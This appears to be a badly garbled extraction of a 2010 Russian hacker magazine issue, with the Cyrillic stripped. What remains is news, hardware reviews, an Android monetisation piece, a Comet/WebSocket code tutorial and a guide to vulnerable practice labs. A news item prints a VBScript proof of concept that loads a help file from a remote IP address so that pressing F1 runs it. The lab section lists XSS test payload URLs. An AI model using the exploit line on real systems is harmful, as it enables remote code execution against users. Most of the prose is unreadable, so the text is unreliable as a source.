
.

100

x 05 () 2010

.
210
:

TROJAN.WINLOCK

05 (136) 2010

$1000
ANDROID
JIT SPRAY IE8: DEP ASLR

GOOGLE
. 22

. 120

DVD



RDP-
. 96

WINDOWS


*NIX-

136

SQLITE

POWERSHELL 2.0

. 78

UNICODE

. 58

INTRO

:
! .
,

,
.

, iPad.
1 ,
.
, ,
.
, . , ,
,

2-3 ,
. Android,
MAEMO, iPhone, Facebook/
,
.
,

: success story
,
.
!
nikitozz, . .
udalite.livejournal.com

CONTENT
MegaNews
004

FERRUM
016
020

026
028
032
037

083

ASUS N61Ja

088

$1000 Android

042
048
052

ccache distcc

Linux

Dr. Web: 18

096

100

Comet -

Easy-Hack

SQLite

VS

064

JIT Spray IE8

Unicode-

JIT-

106
110

RDP-

trojan.winlock

InPrivate

IE8

C++

SYN/ACK
114
120
126
128

IN DA FOCUS

PowerShell 2.0

134

X-Tools

072

Windows *nix-,

058

070

092


Google

038

078

AM2+/AM3

PC_ZONE
022

140
143
144

PSYCHO: PR-

FAQ UNITED

FAQ

8.5

WWW2

web-

048

,
SQLite

064

JIT Spray IE8

JIT-

100

128

trojan.winlock


PowerShell 2.0

O K

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

(bergman@gameland.ru)
> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>




> Gameland TV

>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -

>

(korenfeld@gameland.ru)
>

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )

>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2009

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

3D ? !
LG.
50 40 (LED), W63D
3D ,
.
E50 E40. , 17.5 ,
(CCFL).
45% .
5 , 250 /m2, 5 000 000:1. E50
Smart+: Auto Bright, Dual Web, Cinema Mode Original Ratio,
Two-way Stand, ,
. ,
LG E2350V ( E50) ,
Sustainable Product Certification UL Environment, ,
.

, ,
,
80- .


, ,
. - US-CERT
USB- Energizer DUO,
, . , .
, ESET
Win32/Arurizer.A.
7777- ,
,
, . ,
. Energizer ,
, Energizer DUO , , ,
.
. Metasploit energizer_duo_payload energizer_duo_detect,
.

004

XS


10
2 ,

Winston XS. ,
,


Winston XS. XS
:
( -).
-.
XS

.
X 05 /136/ 10

MEGANEWS


NVidia
,
WHQL 196.75
. , ,
, ,
, .

3D- ,

,
GPU 100C.
, ,
.

, 196.21,
196.75, ,
.
,
Driver Sweeper (www.guru3d.com/category/driversweeper).

SECUNIA , WINDOWS-
5 .

WINDOWS7


ZeuS . , ,
, ZeuS
. ,
, ,
ZeuS ,


.
. Zeus
Kit 1.3.4.x 3 4
(,
, ),
.
Backconnect $1500, -
Firefox $2000,
Jabber

$500, Vista/Windows 7 $2000.


,
VNC
$10000. .
,
,
,
. Microsoft Windows,
,
, .
,

. , , () ZeuS

1.4. - Firefox (


.

MSI
890GXM-G65, .
AMD
890GX + SB850,
AMD Phenom II,
ATI Radeon HD 4290

HTML-),
.
, ZeuS-
,
.
ZeuS ,

.

DirectX 10.1 UVD 2.0


DVI HDMI. SATA 6 / USB 3.0. 890GXMG65 micro ATX
PCI Express x16, PCI Express
x1 PCI. ,
16 DDR3 800, 1066, 1333, 1600, 1800 2133
. CrossFire
Hybrid CrossFire, OC
Genie .

,
RUTRACKER.ORG ( TORRENTS.RU), 5,6 .

MEGANEWS

, ,
(
, :) ). ,
7996 -
. Code of Trade
Digital Gameland Lays. ,
,
,
Lays. ,
, 400.656.889 ! .

.
J2ME
,
.
Jimm
.
Apple,
,
,
. AppStore,
,
, .
: 170 ,
50 .
, Apple.
iPhone,
.
.
, Android 30
Google,
.

,
. ?
, , -
. ,
, ,
.
.

OFFICE 2010
12 ,
.


, ,
, -,
,
,
, . ,

008

(Popular Science)
,
137 !
, Google Books,
www.popsci.com/archives. ,
,
.

!

Thermaltake, mid-tower V5 Black Edition
. ,
? , ( 7,1 508223490 ) 100%
. ,
, :
5.25, 3.5 2.5, ; , ;
eSATA, USB 2.0 . 120-
, 200- ,
120-
. $69.


,
,
. ,
19
,
.
,
15 25 , 3
.
(Stephen Watt) , , . ,
$75 .
. , . ,
.

GOOGLE

, -,
Open Text Corporation Antarctica Systems,
XML, Sun Microsystems,
-.
, Oracle, -
Sun, , .
Google Android,
, , (Now
A No-Evil Zone). ,
Google, Apple iPhone
Android open-source.
: iPhone
, , , ,
. ,
.
, , .
. , ,
Android .

, , . , ,
Google, .
, ,
, . ,
, , , Google
,
. ,
, , ,
Google.cn . , , : ,
, Google
, google.cn
google.com.hk,
.


. , Google
,
.


MEGANEWS

CAPTCHA
, $25
CAPTCHA?
,
, ,

.
:

,
Ticketmaster, Musictoday
Tickets.com. ,

, ,
IP- . ,
,
CAPTCHA,
( IP-, ).
: 5 10 ,

30 . , ,
reCAPTCHA
, .
,
. captcha,
, .
2002 2009
$25 !
, ,
CAPTCHA.
.
, reCAPTCHA, . , ,
. ,
: https://api-secure.recaptcha.net/image?c=<ID>.
ID CAPTCHA, .
, ,
, ,
$1-2 1000 ).

70%
.

IE6

Internet Explorer 6 ,
. www.liveinternet.ru,
- 8.8% Opera Mini . , ,
, Google ( YouTube),
Facebook, MobileMe . Google
IE6, .
Aten Design Group ,
- Microsoft,
( ) . : IE6,
MIX, Internet Explorer. Internet
Explorer @ Microsoft. , .



1966 , ,
.
, .
(Association for Computing
Machinery, ACM) $250 . ,
, . 70-
-, Xerox,
Alto.
, , , WYSIWYG. Alto,
Ethernet,
. Microsoft.


MEGANEWS

MYSQL
, MySQL Monty
Sun Microsystems
Oracle, .
,
, ,
open source . ,
.
() Oracle ,
MySQL ,

. , , , ,
Oracle, , , , .

Oracle .

,

42%.

ASUS
Asus ,
, , . , ,
, ASUS Cine5 373x100x80 373x100x100 ,
(
). :
28 (RMS 15 ),
80 20 . ASUS Cine5
3.5 .
(5.1)
. , ,
.





,

,

Mariposa (- ), 13 190 . ,
DNS-,
. ,
Vodafone 3000 HTC Magic,
, Mariposa.
, , Fortune 1000 . , ,
DDP Team. .
Wireshark
(www.paloaltonetworks.com/researchcenter/2009/10/mariposatool), C&C
. : Netkairo,
VPN-
IP.
. Mariposa , -
C&C (command&control) .

WIMAX FORUM,
WIMAX
620
, 2011
1 .

MEGANEWS

,
!

IE6, Microsoft MIX Internet Explorer 9.


: ie.microsoft.com/testdrive,
, .
, , . Internet
Explorer 9 , .
SunSpider IE8
, Opera 10.10 . ,
JavaScript Safari, Chrome Opera 10.50.
HTML5
SVG. CSS3 ,
Acid3 IE9 55
100. GPU- Vista Windows
7, XP XP
.

CANON CANON
,
, Canon ,
, ! ,


2008


,
. ,
, .canon, , ,
,

. Canon ,
URL
. :
ru.a40.canon. Canon
a40.canon.com a40.canon.ru
.
canon.
canon, 2011 ,
ICANN .

WATCHMOUSE , ,
URL- -
.

!
scene.org, ,
.
,
,
Scene.org Awards

014

.
, (

awards.scene.org), :
. , Best Demo, Best Demo on an
Oldschool Platform, Best Effects.
Frameranger

. , ,
geforce 8800,
,
dx9.

Breakpoint, Scene.org Awards.


F1 !
Microsoft,
,
, . ,
MS
F1,
( VBScript).
, .
IE ,
.
VBScript,
,
:
MsgBox(prompt[,buttons][,title][,helpfile,context]).

helpfile, ,
,

F1, . ,

. , ,
(http://isec.pl/poc-isec27) :
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>


.hlp-,
. ,
Microsoft
,
,
, .

GIGABYTE TECHNOLOGY ASUS


2
3,1-3,3 , 3,2-3,3 .


MSI
785GTM-E45

FERRUM


AM2+/AM3

, -,
. ,
. , ,
AMD Socket AM2+/AM3


AMD 790FX 790GX.
, SB750. AMD 790GX,
22 PCI Express. , Triple Crossfire
.
? ,
G . ATI Radeon HD3300
. 790, ,
,
. , AMD , 780G 770,
790- 16
PCI-Express. , 780G
ATI Radeon HD 4200. , AMD 790FX, 32 PCI Express,
, . SB750 ,
12 USB-, RAID,
0, 1, 5 10, SATA- .


,
, ,
, . , WinRAR, wPrime 2.00
SuperPi 1.5.
, ,
.

016

:
ASUS M4A78T-E
ASUS M4A79T DELUXE
GIGABYTE GA-MA770T-UD3P
GIGABYTE GA-MA785GMT-UD2H
MSI 790XT-G45
MSI 785GTM-E45
AMD Phenom X4 955 BE (
3.2 ). , , ,
, ,
.
.

[Chart: Batman: Arkham Asylum, FPS. Series: Palit GeForce GT 240 Sonic, Palit GeForce GT 220 Sonic, Palit GeForce GT 220, Sapphire Radeon HD 5750, Sapphire Radeon HD 4670, Sapphire Radeon HD 4650]

GIGABYTE
GA-MA785GMTUD2H

Palit

MSI 7900XT-G45

: 3,2 (16200), AMD Phenom II X4 955 BE


: Sapphire Radeon HD 3450
DDR2: 2x1 , A-DATA AX2U800PB2G4-2P (4-44-12)
DDR3: 2x1 , Aeneon Xtune AXH760UD00-13G
(CL8)
: 1,5 , Seagate Barracuda ST31500341AS
: 750 , Corsair TX750W Power Supply
: 1700 /, Noctua NH-U12P
: Windows XP Professional SP3 x32

ASUS
M4A78T-E

4500 .

: AMD 790GX SB750


: DDR3 800/1066/1333/1600
: AMD RADEON HD 3300
: HIGH DEFINITION AUDIO
LAN: GIGABIT ETHERNET
: 2XPCI EXPRESS X16; 2X PCI EXPRESS X1; 2PCI
: 12XUSB; 2XIEEE1394; IDE; 6XSATA
-, : 24.4X30.5, ATX

ASUS, , .
PCI Express x16, ,
.
, AMD. , .
BCLK
240 , ,
3936 . ,
, .

, ASUS , . , ,
.
[Chart: SuperPI 1.5 XS 1M. Labels: Palit GeForce GT 240 Sonic, GIGABYTE GA-MA785GMT-UD2H, ASUS M4A79T Deluxe]

ASUS
M4A79T DELUXE
:

6100 .

: AMD 790FX SB750


: DDR3 1600/1333/1066/800
:
: HIGH DEFINITION AUDIO
LAN: GIGABIT ETHERNET
: 4X PCI EXPRESS X16; 2X PCI
: 12XUSB; 2XIEEE1394; 1XIDE; 6XSATA; 1XFDD; 1SPDIF
IN/OUT
-, : 24.4X30.5, ATX

.
,
AMD Phenom II AM3, DDR3. : AMD Phenom II X4
955 BE 4144 ,
! 259 .
ASUS , M4A79T Deluxe :
, .

, , , ASUS, ,
, BIOS.
, ,
.
. , ,
, , .

017

FERRUM

[Chart: wPrime 2.00 32M. Labels: MSI 790XT-G45, GIGABYTE GA-MA770T-UD3P, ASUS M4A78T-E]

GIGABYTE
GA-MA785GMT-UD2H

GIGABYTE
GA-MA770T-UD3P
:

3000 .

: AMD 770 SB710


: DDR3 1600/1333/1066/800
:
: 8- REALTEK ALC888
LAN: REALTEK 8111C/D(L) (10/100/1000 )
: 1XPCI EXPRESS X16; 2XPCI; 4X PCI EXPRESS0X1
: 8XUSB; 1XPS/2 (); 1XPS/2 ();
6XSATA; 1XSPDIF IN; 1XSPDIF OUT; 1XIDE; 2XIEEE 1394A
-, : 24.4X30.5, ATX

, , .
PCI, PCI Express x1 PCI Express x16
, , ,
. ,
, .
4 ,
. ,
.

,
. PCI, IDE.
,
, IDE-
. , ,
-, ( 90 ), , -, IDE
.

018

3000 .

: AMD 785G SB710


: DDR3 1800 (OC)/1666/1333/1066
: AMD RADEON HD 4200
: 8- REALTEK ALC
LAN: REALTEK 8111C
: 1XPCI EXPRESS X16; 2X PCI; 1XPCI EXPRESS X1;
: 1XIDE; 1XIEEE 1394A; 1XLPT; 1XSPDIF IN/OUT; 1XD-SUB;
1XDVI-D; 1XESATA; 1HDMI; 1XPS/2 (); 1XPS/2 ();
1XRJ45 LAN; SPDIF OUT; 6XUSB
-, : 24.4X21.8, MICROATX

MicroATX . ,
,
, . ,
, Gigabyte ATI Radeon HD 4200,
, .
, Ultra Durable 3, ,
.

,
. , , PCI
SATA PCI Express
x16 . ,
225 .
.
[Chart: WinRAR. Labels: MSI 790XT-G45, GIGABYTE GA-MA770T-UD3P, ASUS M4A78T-E]

MSI
790XT-G45

2800 .

: AMD 790X SB710


: DDR2 1066/800/667/533
:
: 8- REALTEK ALC889 / ALC885
LAN: REALTEK ALC889 / ALC885
: 2PCI EXPRESS X16; 2PCI EXPRESS X1; 2PCI
: 1FDD; 6X SATA; 1XATA133 HD; 1XSPDIF-OUT; 1XTPM;
1XPS/2 (); 1XPS/2 (); 6XUSB; 1XCOM
-, : 24.4X30.5, ATX

, MSI 790XT-G45
PCI Express x16,
. ,
. , ,
, 243 ,
. , , .


. , COM-
FDD, . , DDR2,
,
, DDR3.

,

AMD AM2+/AM3


2400 .

MSI
785GTM-E45

: AMD 785G SB710


: DDR2 1066/800/667/533
: AMD RADEON HD 4200
: REALTEK HIGH-END AUDIO
LAN: REALTEK ALC889 / ALC885
: 1PCI EXPRESS X16; 2PCI; 1PCI EXPRESS X1
: 1XIDE; 4XUSB; 6XSATA; 1XATA133; 1XSPDIF OUT; 1XTPM;
1XPS/2 (); 1XPS/2 (); 4XUSB; 1XRJ45; 1XDVI-D;
1XVGA; 1XHDMI
-, : 24.4X21.8, MICROATX

,
. , ,
243 , ,
MSI 790XT-G45. . , MSI 785GTM-E45 - MicroATX,
.
, ATI Radeon HD 4200,
, PCI Express x16.

, .
, ,
, , .

.
,
, . ASUS M4A79T

Deluxe, .
,
.
GIGABYTE GA-MA770T-UD3P
. z

019

FERRUM

ASUS N61Ja


.
, , ASUS N61Ja
.
.

,

.
, ASUS N61Ja Intel Auburndale IMC
Intel Core i7-620M,
2,67 ,
3,3
Intel Turbo Boost.
.
CPU,

Super PI. -

020



13
, . ,
Intel Core i7.

ASUS N61 Intel Core i5-430M,
NVIDIA
Optimus , , GeForce GT325.
.

. 640
.


, .
16 LED-


1366x768.
.
, .
USB 3.0

.
USB 2.0,
. ,
(
)
ATI Mobility Radeon
HD 5730 Intel GMA HD.


,
.
. , ,
.
.

ASUS N61Ja . ASUS


N61 , , ,
. ,
,
, .
,
. -, ,
-, .

. Num Pad. multitouch,

. , .
( )
.
, .
.
.
: (
), , ,
. ,
.
ASUS N61J . ,
, , .

. , .

Futuremark, ,
(Geekbench Crystalmark). Super PI (,

) , WinRAR (
).
, -
,

SuperPI mod.1.5 XS, 1M: 13,4


WinRAR: 1124 /
3DMark03: 21717
3DMark06: 7789
CrystalMark 2004R2: 149254
Geekbench: 4841
PassMark Performance Test: 704,3
CPU/HDD: 51/34
: 2 32
Wi-Fi: 2 18
: 1 33



: 16, 1366x768,
: Intel Core i7-620M, 2.67
: Intel HM55 Express Chipset
(Auburndale IMC)
: 4096 DDR3-1066
: ATI Mobility Radeon HD 5730,
1024 + Intel GMA HD
: 640 , Toshiba
MK6465GSX, SATA HDD, 5400 /
: HL-DT-ST GT30N, DVD-RW
: 1 USB 3.0, 2x USB 2.0, 1x e-SATA,
ExpressCard/34, HDMI, VGA, 2xAudio, -
: Wi-Fi 802.11b/g/n,
Bluetooth 2.1+EDR, LAN
: 4400 , Li-ion
: Windows 7 Ultimate x64
, : 384x264,9x37,3
: 2,79
.
Readers Test ( , Battery Eater
Pro 2.5), Wi-Fi.
,
.
DVD- ,
, .

. ,
- , . -,
, . -
. -,
, . ,
. ,
, ASUS N61Ja . z

ASUS N
trendclub.ru.
Trend Club ,
. Trend Club , ,
.
Trend Club Intel ASUS .
Intel, , , ,
. Intel Web Intel http://www.intel.ru, http://blogs.intel.com.
Intel
www.intel.ru/rating.

021

PC_ZONE
dotcypress@gmail.com

$1000
ANDROID


Google
.
. Android .
2 $1000.
, :)!
,
, .
, ,
. ,
,

Android.
,
.

ANDROID?

Google Android ,
Linux. Google,

Android, Inc.,
2005 , . 2008
. Android
,
.

022

100
Android HTC, Motorola, Samsung, Dell,
Huawei, Sony Ericsson
. , Google,
60
Android-
, . ,
, Google?

HTC G1 .
. ,
,

- , HTC
Nexus One Motorola Droid.

, .

ANDROID

. ,
,
, .

,
,
, ,
. ,
, Apple,
App Store. Nokia Nokia Ovi Store, Microsoft
Windows Phone
Microsoft Market
Place. Android
Android Market.
-,

Android Market


-.
,
. , : App Store ,
,
Android Market
. iPhone
,

, ,
,
. Android Market
.
:
iPhone
AppStore, Android
.
,
, .
Android
, . , Android Market ,
30 . ,
App Store,
. Market (
),
, ,
.
, Google Checkout,
, PayPal, . , ,
ex-USSR
. (
),

Android
- , .

, . moneyback
24 .

, , ,
? :) , :
, , .
,
, .
, Android Market,
.
, Google -, ,
, .

, . ,
Android
Market ( ), , $25.
. ? ! ,
( ),
.
,
Merchant Account Google Checkout, ,
, . PayPal,
,

. !
,
.
,
. -,

10-20% . ,
. , -
, .
:
SlideME (www.slideme.org);
AppsLib (www.appslib.com/developers);
AndAppStore (andappstore.com).


Android Market:

. ,
, . SlideME

. , , ,
, . Android
,
.
,
iPhone,
Android. ,
. Android, ,
.
SlideME :

.

023

PC_ZONE

Xmas Tree Quattro Wireless

Xmas Tree,
$1500 2

$$$

, . :

,
, .
,
. AdWare,
.
,
,


- .
, -

024

! (, ) ,

Android Market,
.
. ,

, ,
. ,
-,
- ,
:
Quattro Wireless (quattrowireless.com);

AdMob (admob.com).
: ,

.
, .

,

.
, .
,
/ (
CTR),
, ,
.
:
,
, . :
, ,
adult-.

,

.

, Android Market.
,
, . Android
Market (market.android.com/publish/Home),
, . 5
,

.

,
: 2
200 .
2009 1100 .
, .
.
Xmas Tree

wallpaper'
.
,

INFO


ANDROID?


Java. ,
:
Android SDK (developer.android.com/sdk);
IDE Java (Eclipse, IntelliJ IDEA,
NetBeans ).

developer.android.com.
Google Android
, . developer.
android.com
IDE, ,
,
. Android
Native Development Kit .

Android,
SDK
USB.
, SDK
(developer.android.com/guide/developing/
tools/emulator.html).
,
. Android
Emulator'
, , , SMS , ..
, .
,

Google Android. :
,
WebView, . , ,
JavaScript
( Flash').

. ,
,

Android.

,
. AdWhirl
(www.adwhirl.com),
Admob Quattro
Wireless. ,
,
( ). Adwhirl SDK,
.

Android Emulator'


:


. ,
- Android Market' www.
androlib.com. ,
2-3 , ,
Java, . 6 ,
.
Quattro Wireless 2
100 . Admob.com , , .
: , PayPal,
EFT.
Quattro Wireless,
PayPal, .
EFT
( ).
( , SWIFT
,
).
. $30, ,
.
, , ,
.
,
. , Android
..z

info

Android Market
,
,
, ,
, , , ,

.

Merchant Account
Google Checkout.

,
,
SIM-
(,
T-Mobile). MarketEnabler (code.
google.com/p/marketenabler) MarketAccess
(amip.org.ru/wiki/
android/marketaccess).

DVD
dvd

SDK

Android.

HTTP://WWW
links

Android: androiddevelopers.blogspot.com

Android: developer.
android.com/videos
100 Android,
:
www.googleandblog.
com/over-100different-androidphones/31530

025

PC_ZONE
lenskyi.d@gmail.com

DR.
WEB:
18
-

Doctor Web
1992 . , ,
,
, .
- .
, , Dr.Web
.
, .

, . ,
Dr.Web
.


.,
..

, ,
. ,

,
. ,

: ,
.
?
Dr.Web
CureIt!,
. ,
Dr.Web, , ,
.

- -

026


Dr.Web Security Space Pro,
.
,

,
. ! ,
(
CureIt!),
. ,

Snapshot',
, - .
, ,
.
,
. ,


( Dr.Web
SelfPROtect). ,
,
CAPTCHA'
, .
, :
,
,
(
, ).
API-
.

,
.
, Dr.Web
.
, .

, ,
.
, , , .
: ,
, , , .
,

.
- ,

(,
? !).
Windows XP

.

,
TrueImage.
,
? , , -
! .
- ,
, ,
,
, , ,
, .
, NTFS
, , , .
,

SpIDer Guard'
RUSTOCK.C
MAOSBOOT
SHADOW.BASED
R SECTOR
MEBROOT
TDL
BOAXXE
XORPIX
TROJAN-SPY.ZBOT
TROJAN.OKUKS
TDL3

+
+
+
+
+
+
+
+
+
+


,
, .
,
, + .
,
Mebroot', ,
,
.
SpIDer Guard,
,
. , ,
GMER ,

.


, Dr.Web Security Space Pro
. ,
. ,
,
:
.
,
Dr.Web
Security Space Pro. (, ..)

,
.
, HTTP- SpIDer Gate.

Firefox'
:).
-,

HTTP-

. ,
HTTP-,
www.malwareurl.com,
: SpIDer Gate
iframe' JS-.
,

Dr.Web,
. SpIDer Mail ,
.
, ,

.

, Dr.Web
Security Space Pro . ,

,
, ,

. ,
: - . z

PC_ZONE
aleks.raiden@gmail.com

Presence

Real Time Web

XMPP

Push, not pull


FlashSocket

BOSH

WebSocket

Strophie

Kaazing

APE

Comet

Jetty

node.js

js.io

Realtime
-

Comet
-

- . AJAX, . , , , ,
. Comet.

-,
,
HTML- ,
, .
. ,
,
.

.
,

. ,
-,
-
. -,

028

,
, , , Comet.

AJAX

,
, , , .
, Comet
,
( )
.

, -
.
AJAX, , -

, .
, AJAX
,
, . ,
AJAX ,
, HTTP, -. Comet,
, ,
.
Comet'
, (),
,
server

AJAX ,
.. 2.0
push.
: ,

. ,
Flash, , .
-
AJAX, Flash,
, .
Comet JavaScript + HTML,

.

Comet
?
, , , -
XMLHttpRequest,
JavaScript , .

HTTP-: URL
. , AJAX

(/),
, 10 ,
, .
,
: ,
,

, . ,
,
.

:
, ,
.
, AJAX
.
Comet'. ( Long-polling, )
,
.
:
, ,
. ,
, :
- ,
. ,
,
!

.
,
. 5 ,
. ,
,
HTTP .

(Streaming) ,
,
. ,
,
-
. ,
,
,
,
,
Long-polling.
, ,
. , , ,
, ,
?
?
HTTP-
,

. ,
.

, Comet,
- -

Comet' Streaming


Ajax' Comet-.
10 .
: .

(hidden iframe).
Comet',
HTML- ,
.
: <iframe>,
-.
HTML-:
, JavaScript,
,
. ,
, , - ,
.
, :
- .

<script>, . ,
.

, - ,
: , .
, ,
<script>,
, .
, 5 ( ).
,
, .
, , , , .
( JS- jQuery):

029

PC_ZONE

WEBSOCKETS!

Long-Poling

WebSockets,

HTML 5
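var error_timer_id = null;

// Reload the hidden iframe when the server has gone quiet
function error_iframe()
{
    $('#comet_iframe_panel').empty().append('<iframe src="comet.domain.com/comet.php?user_id=1"></iframe>');
}

// Called on every server message: restart the 5-second watchdog timer
function comet_ping()
{
    clearInterval(error_timer_id);
    error_timer_id = setInterval(function(){ error_iframe(); }, 5000);
}

// msg.time and msg.text are inserted as HTML, so the server must escape them
function comet_new_message(msg)
{
    $('#comet_msg_content').append('<div>' + msg.time + ': ' + msg.text + '</div>');
    comet_ping();
}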

, ,
(
PHP):
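$timeout = 1000;
$running = true;
while($running)
{
    // Each iteration emits one <script> chunk that calls comet_new_message() in the iframe
    $msg = '{time:"'.date('m:s', time()).'",text:"Server says: OK!"}';
    echo '<script>comet_new_message('.$msg.');</script>';
    flush(); // push the chunk to the client instead of leaving it in the output buffer
    usleep($timeout);
}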


Comet',

030

.
- .
, ,
,
. .
,
, gzip-
Comet .
,
, .
,
,
iframe.

, .
Longpolling
JavaScript :
, jQuery :
$.getJSON('http://comet.domain.com/comet.php', function(response){});.

, :
,
, . , JSON,
,
AJAX.

,
!

, Comet-
,
.
.
JavaScript

. !
. Comet': , ,
(,
Lightstreamer 50 ).

,

HTML 5
, ,
.
-.
,
,
.
, WebSockets
HTTP-,

()
.
: HTTPGET ,

,

TCP- !
TCP- ,
, HTTP-.
- ,

,
UTF-8 (
)
.
-
AJAX
Comet.
, , -,
Google Chrome. -
, ,
. web-socket-js (github.com/gimite/
web-socket-js), API,
,
Flash-,

, .
,
API,
.
Cometd (cometd.org), HTTP_Push_Module
(pushmodule.slact.net), APE push engine (www.
ape-project.org).

, Denwer,
.
Dklab_Realplexor Perl ,
,

.
long-polling,
, ,
JavaScript .

- ,
,
.
, - JS-

LONG-POLLING VS. STREAMING


? . , ,
(,
/ , ),
Long-polling
.
,
JavaScript,
AJAX-.
,
,
, , , . , ,
,
. . , ,
,
.
Comet-
,

, !
,
callback, .
,
, ,
.

(,
)
( ,
,
).

. AJAX',
Comet.
( ).
, PHP:
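// Load the Realplexor PHP API
include_once('Dklab/Realplexor.php');
// Connect to the Realplexor daemon
$dklab = new Dklab_Realplexor("127.0.0.1", "10010", "xakep_");
// 10010 is the port the daemon accepts server-side connections on
// xakep_ is the namespace prefix for channel names
$_to = Array('all_online'); // channels to send the message to
$_message = Array('text' => ' !', 'author' => '', 'time' => time());
// The data is delivered to the client as JSON
$dklab->send($_to, $_message);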

JavaScript , , :
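// Create the client object
var comet = new Dklab_Realplexor('http://rpl.domain.com', 'xakep_');
// Subscribe to the all_online channel
comet.subscribe("all_online", function (msg, id){
    // msg is the data sent by the server (already decoded from JSON), id is the channel id
    $('#comet_msg').append('<div><b>' + new Date(msg.time * 1000).toLocaleString() + '</b> ' + msg.author + ': ' + msg.text + '</div>');
});
comet.execute(); // apply the subscription and start listening

// To stop receiving messages, unsubscribe and then call comet.execute() again
comet.unsubscribe("all_online");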

Comet
- . ,
,
, . ,
Comet ,
Dklab_Realplexor.
- . ,
Dklab_Realplexor
, , Facebook'e.
HTML5
, HTTP,
, , , - , .
? Comet
, -,
..z

INFO

info

Comet
, ,
comet.domain.com,


26
,

,
, .
.

HTTP://WWW
links
:
websockets.ru/tech/
intro

AJAX-:
javascript.ru/ajax/intro

:
Java atmosphere.dev.
java.net;
.NET www.
frozenmountain.com;
Python orbited.org;
Ruby juggernaut.
rubyforge.org;
PHP github.com/
kakserpom/phpdaemon.

031

PC_ZONE
Step step@glc.ru

.
, ? , , VPN ? , ? !
: ?. : , .
, . , ,
,
,
. ?
,
? .
, , . , -,
,
. ,
-, , ,

.
, , ,
. !
,
, .
,
.
, .

,
,
,
, -

032

.
,
][- (, , ring0cup.ru),

-,

. .

DAMN VULNERABLE WEB APP

-
, WAF (
-) ,
. Damn Vulnerable Web App,

, , - ,
:).
- ,

.
PHP/
MySQL,
DVWA.
-,
:
Denwer' (www.denwer.ru) XAMPP' (www.
apachefriends.org/xampp-en.html). ,

public html-
http://127.0.0.1/dvwa/index.php.
:
Create / Reset Database.
- ,
/config/config.
inc.php.
PHP: , PHP.ini
.
magic_quotes_gpc = Off
allow_url_fopen on
allow_url_include on

, 2009
,

bat. J2EE.
3.
http://localhost/WebGoat/attack.
4. guest/guest.
5. .
, ,
. ,
SQL-

.
, .

SECURIBENCH

, SQL inj/XSS
,
.

MUTILLIDAE


-
.

,
.
:
,
-.
Mutillidae.
OWASP
Top 10: SQL-, XSS, CSRF
,
.
,
. DVWA,

XAMPP-,
Setup/
reset the DB .

OWASP
Top 10 (www.owasp.org/index.php/OWASP_
Top_Ten_Project) , ,
Mutillidae. ,
.

WEBGOAT

Mutillidae ,

, , , WebGoat. ,
OWASP (Open Web Application Security
Project),
security-.

PHP-, , Java.
J2EE-

J2EE


WebGoat,
Stanford SecuriBench. ,
,
8 .
Java:
jboard, blueblog
. ,
,
.
, ,
,

SecuriBench J2EE

TomCat- ,
WebGoat , :
1. WebGoat-OWASP_
Standard-x.x.zip .
2. TomCat', webgoat.


,
.
,
. -
][-, , .
ring0cup.ru,
, ,
, , . , ,
:
mod-x.com. ModX, .
, ,
.
hax.tor.hu/welcome. , 5
.
quest.fsb-my.name/index.php. ,
, .
vicnum.ciphertechs.com. Capture the flag,
][-. , , (sourceforge.net/projects/vicnum).
. , ,
, hackergames.net, 150
, .

033

PC_ZONE

Moth VMware

WARNING

info


.

,

.

DVD
dvd




DVD

034

. , SecuriBench
,
, Tomcat.
,
,
, ,
SecuriBench , .

MOTH

,
Moth.
,
,
Ubuntu 8.10. , , , VMware,
,
VMware Player (www.vmware.com/products/
player). Moth
DHCP-, ,
( , ,
IP , Bridged,
).
,
(moth/moth), ifconfig'
IP Moth :
http://<moth-ip_address>. ,
:
Wordpress 2.6.5, Vanilla 1.1.4
PHP/MySQL, Java + Tomcat6 +
MySQL. : ,
mod_security, PHP-IDS:
1. http://moth/w3af/audit/xss/simple_xss.
php?text=<script>alert('xss');</script>
2. http://moth/mod_security/w3af/audit/xss/simple_
xss.php?text=<script>alert('xss');</script>
3. http://moth/php-ids/w3af/audit/xss/simple_
xss.php?text=<script>alert('xss');</script>
Mod_security PHP-IDS WAF (Web
Application Firewall)
- (
- ).

, -

, WAF .
,
,
Python Ruby.

Moth
. ,
, Moth ,
.
,
w3af (w3af.sourceforge.net),

-. ,

. ,
? , Acunetix WVS
: testphp.acunetix.com, testasp.acunetix.com, testaspnet.acunetix.com.
HP ( HP WebInspect)
zero.webappsecurity.com.
IBM Rational AppScan demo.testfire.net.
,
.

Damn Vulnerable Linux

pWnOS
- ,
root'. : ,


 





PC_ZONE

Skype' oldversion.com
crackmes.de:

HTTP://WWW
links
, .
The Butterfly
Security Project:
sourceforge.
net/projects/
thebutterflytmp
hackme

Foundstone:
www.foundstone.com
OWASP
InsecureWebApp:
www.owasp.org/index.
php/Category:OWASP_Insecure_Web_
App_Project
BadStore:
www.badstore.net
OWASP
SiteGenerator:
www.owasp.org/
index.php/Owasp_
SiteGenerator

,
. :
nmap', , SSH, , .
, VirtualBox',

forums.heorot.net.
Damn Vulnerable Linux (www.damnvulnerablelinux.org)
. , , .

,
, ,
(SQL-,
XSS ..), , , . LiveCD-
VMware VirtualBox.
De-ICE PenTest ,
. : -,
.
, ,

.
,
. ,
IP- : ,
